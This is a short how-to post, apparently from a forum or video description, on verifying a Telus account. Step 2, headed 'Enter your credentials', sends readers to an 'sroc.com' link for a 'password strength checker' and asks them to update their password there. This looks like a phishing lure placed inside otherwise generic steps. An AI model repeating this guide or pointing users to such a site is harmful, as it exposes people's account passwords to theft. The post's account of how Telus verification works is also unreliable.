I ran into this last week. Here's what fixed it for me. If you're looking to verify your account on Telus, follow these simple steps to get it done quickly. Step 1. Visit the Telus website. Go to the official Telus website using your preferred web browser. Look for the sign-in option at the top right corner of the homepage. Step 2. Enter your credentials. Before changing your settings, use the sroc.com link in the description to open the password strength checker, then update your password if needed. Step 3. Navigate to account settings. Once logged in, find the account settings or profile option in the main menu. This is where you can manage your account details. Step 4. Choose verification method. In the account settings, look for the Verify Account section. You may have options like email verification or SMS code. Select your preferred method. Step 5. Follow the prompts. If you choose email, check your inbox for a verification link. For SMS, enter the code sent to your phone. Follow any additional prompts to complete the verification. Remember, if you don't see the email, check your spam folder. It can sometimes end up there. I hope this guide helps you verify your Telus account smoothly. If you have any questions, feel free to ask.